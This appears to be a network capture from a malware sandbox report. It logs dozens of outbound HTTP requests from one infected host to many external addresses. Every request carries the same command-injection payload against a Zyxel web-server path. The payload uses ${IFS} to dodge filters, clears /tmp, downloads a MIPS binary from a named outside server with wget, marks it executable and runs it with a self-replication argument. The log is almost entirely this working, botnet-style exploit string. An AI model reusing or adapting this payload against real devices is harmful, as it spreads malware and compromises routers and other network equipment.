                                            Jan 14, 2024 15:50:30.260746956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1686192.168.2.235994240.103.123.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260754108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1687192.168.2.2337640172.124.114.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260792017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1688192.168.2.234923473.135.6.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260792017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1689192.168.2.2340770101.81.43.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260834932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1690192.168.2.2336038121.52.28.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260865927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1691192.168.2.2350582134.74.48.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260886908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1692192.168.2.234121223.224.52.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260931015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1693192.168.2.2339648168.246.199.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260972977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1694192.168.2.234141898.231.190.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260979891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1695192.168.2.2359674117.46.215.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261020899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1696192.168.2.235168842.80.152.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261063099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1697192.168.2.2352886136.15.112.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261063099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1698192.168.2.2353720169.241.66.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261106968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1699192.168.2.2342062150.242.249.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261120081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1700192.168.2.2344312113.47.7.246443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261130095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1701192.168.2.2334380117.73.6.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261142015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1702192.168.2.2335862104.239.194.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261190891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1703192.168.2.235383465.41.146.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261224031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1704192.168.2.2342206157.43.28.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261238098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1705192.168.2.234778281.215.223.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261261940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1706192.168.2.2354304182.32.92.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261271000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1707192.168.2.234352419.87.222.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261292934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1708192.168.2.2338276186.80.4.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261305094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1709192.168.2.2343352186.44.52.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261348963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1710192.168.2.2347414142.60.179.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261390924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1711192.168.2.2356884113.7.225.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261409044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1712192.168.2.235005650.12.15.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261425972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1713192.168.2.2342228158.110.194.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261464119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1714192.168.2.233555234.128.14.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261499882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1715192.168.2.234407069.251.129.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261504889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1716192.168.2.2360330161.161.130.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261548042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1717192.168.2.23395108.161.243.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261564016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1718192.168.2.2351440221.219.207.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261569977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1719192.168.2.2341660107.240.225.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261593103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1720192.168.2.2344330216.158.243.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261614084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1721192.168.2.235350078.232.216.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261677027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1722192.168.2.234019273.22.108.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261681080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1723192.168.2.2346876169.32.162.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261688948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1724192.168.2.2346042105.132.132.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261735916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1725192.168.2.234040614.85.50.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261790037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1726192.168.2.2343456207.246.104.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261804104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1727192.168.2.233704053.141.10.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261846066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1728192.168.2.2358874145.160.197.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261895895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1729192.168.2.2358728217.67.244.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261905909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1730192.168.2.2358058100.243.93.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261926889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1731192.168.2.2339952221.52.60.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261956930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1732192.168.2.234538682.118.237.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261967897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1733192.168.2.234244041.104.24.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.261976957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1734192.168.2.2360898203.236.251.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262037039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1735192.168.2.2334604210.75.195.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262072086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1736192.168.2.2335072138.229.108.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262090921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1737192.168.2.2359912125.178.26.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262135029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1738192.168.2.234789220.31.28.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262146950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1739192.168.2.234236267.143.79.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262173891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1740192.168.2.2341762126.28.204.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262181044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1741192.168.2.2343572135.186.200.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262217999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1742192.168.2.234875852.100.181.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262234926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1743192.168.2.235576489.228.186.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262269974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1744192.168.2.2354398208.179.194.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262304068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1745192.168.2.2350274150.55.18.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262335062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1746192.168.2.2344788119.57.214.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262351036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1747192.168.2.23584264.194.107.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262381077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1748192.168.2.2349246174.244.100.64443
                                            TimestampBytes transferredDirectionData
